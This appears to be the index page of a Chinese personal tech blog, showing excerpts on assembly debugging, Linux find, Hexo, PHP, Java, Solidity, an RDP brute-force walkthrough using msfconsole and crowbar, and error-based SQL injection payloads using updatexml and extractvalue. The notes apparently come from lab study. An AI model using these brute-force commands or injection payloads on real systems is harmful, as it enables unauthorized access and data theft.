Spencer

今天看完第二章，学习了主要的实验：汇编调试，用来查看机器码，汇编语言，以及CS:IP地址之间的关联。 一般我们在查看CS:IP指向的内存，然后在CS:IP指向的内存中写入一定内存的机器码转成汇编或者是直接写入汇编指令。 先来说一下调试实验用的工具：debug.exe.是汇编语言书上说的，但是WINDOWS7及以上的系统削减了debug，导致我们没法在dos命令中直接Debug,我们要获取一个环境 1.安装windows2000server虚拟机 2.这个方法比较简单，就是下载一个dosbox，直接去网上搜，按照默认路径下载，我也附上下载地址： https://files.cnblogs.com/files/ECJTUACM-873284962/DOSBox0.74-win32-installer.rar 然后下载Debug.exe32位程序，附上下载地址 https://files.cnblogs.com/files/ECJTUACM-873284962/DEBUG.zip 下载好之后，打开dosbox然后输入 1mount c debug.exe的安装地址 即可完成挂在。然后直接输入 ...

基础的就跳过了，也就是一开始的16进制运算 我们简要复习一下基础内容 汇编语言（Assembly Language）是任何一种用于电子计算机、微处理器、微控制器或其他可编程器件的低级语言，亦称为符号语言。 在汇编语言中，用助记符代替机器指令的操作码，用地址符号或标号代替指令或操作数的地址。 在不同的设备中，汇编语言对应着不同的机器语言指令集，通过汇编过程转换成机器指令。 也就是汇编语言经机器转换成二进制机器码让机器执行，汇编语言是最接近计算机的语言。 计算机CPU由寄存器，加法器，控制器和逻辑总线构成，常见的CPU有很多年前的8080和8086CPU 8080CPU是8bit的，一次能处理8位数据，也就是能够一次性处理，传输，暂时存储的信息的最大长度是8位的 8086CPU是16bit的，一次最多处理16位。 8086有20位地址总线，可以传送20位地址，如果从内部来看，只将地址从内部简单的发出，只能传送16位，8086CPU采用从内部用两个16位地址合成的方法（见数字电子技术基础（第七版））来形成一个20位的物理地址。 常用寄存器有AX,BX,CX,DX等等 一般寄存器里面有4个十 ...

语法1find path -option [ -print ] [ -exec -ok command ] {} \; 参数说明 : find 根据下列规则判断 path 和 expression，在命令列上第一个 - ( ) , ! 之前的部份为 path，之后的是 expression。如果 path 是空字串则使用目前路径，如果 expression 是空字串则使用 -print 为预设 expression。 expression 中可使用的选项有二三十个之多，在此只介绍最常用的部份。 -mount, -xdev : 只检查和指定目录在同一个文件系统下的文件，避免列出其它文件系统中的文件 -amin n : 在过去 n 分钟内被读取过 -anewer file : 比文件 file 更晚被读取过的文件 -atime n : 在过去 n 天内被读取过的文件 -cmin n : 在过去 n 分钟内被修改过 -cnewer file :比文件 file 更新的文件 -ctime n : 在过去 n 天内创建的文件 -mtime n ...

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment

先用msfconsole搜索auxiliary辅助模块里面rdp_scanner并使用，检测目标是否打开端口等。 然后打开crowbar工具 输入参数 python3 crowbar.py -b rdp -s 192.168.xx.xx/32 -U user_file -C pass_file 然后等待爆破 然后sudo xfreerdp /u:user /p:password /v:靶机ip 即可捕捉界面，完成。

1234strtoupper()转换成大写ucfirst()第一个字符转换成大写lcfirst()第一个字符转换为小写ucwords()第一个单词转换成大写

java创建数组12345678910double[] a;//声明数组int N = 100;a = new double[N];for (int i = 0;i < N;i++) { a[i] = 0.0;//初始化！}//也可以用简单写法double[] b = new double[N];//或者直接声明初始化double[] c = {1,2,3,4,5,6}; 找到最大值伪代码 123456对于一个数组a[n]max = 0for i in range(length(a[n])): if (a[i] > max): max = a[i]return max 我们用java来实现一下 12345678910int N = 100;double[] a = new double[N];//声明数组for (int i = 0;i < N;i++) { a[i] = i;}double max = 0;for (int i = 0;i < N;i++) { if (a[i] > ...

123456789101112131415161718192021<?php class Car{ public $color; public $model; public function __construct($color, $model){ $this -> color = $color; $this -> model = $model; } public function message(){ return "My car is a".$this -> color."".$this -> model."!";#注意要加分号！ }}#上面完成了对类的定义！$myCar = new Car("black", "Volvo");#实例化类，对其对象赋值；echo $myCar -> message();#调 ...

用int 和uint来声明，其中X是8-256之间的8的倍数，表示有多少个bit(二进制位)，如int8,uint32 12type(x).maxtype(x).min会给出当前类型x能取的上下界。 address与address payable储存160个bit长的信息，后者多了向他转账的功能 1address.balance返回当前地址金额 12345address payable x = address(0x123);address myAddress = address(this);x.transfer(10)//or x.send(10)都表示向x转账10第二行表示当前合约的地址。 同样有短路操作&& || 定长数组：bytes1,bytes2,bytes32......表示储存了1，2，32个bytes的数组。 bytes32 x可以用下标访问。同样有位运算，常规数组和C++类似 如int a[10]; 支持动长数组 a[] .length返回长度 .push增加新元素并返回新长度，在solidity练习中练习过。 也用char来声明字符变量， ...

1?username=admin'--+&password=admin' sql注入五-报错注入此处使用updatexml() 1?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 或者用extractvalue() 1?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+ 查询表o 1?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) --+ 1?id=1' and extractvalue(1,concat(0x7e,(select id from database.table_name),0x7e)) --+ sql注入六-报错注入与 ...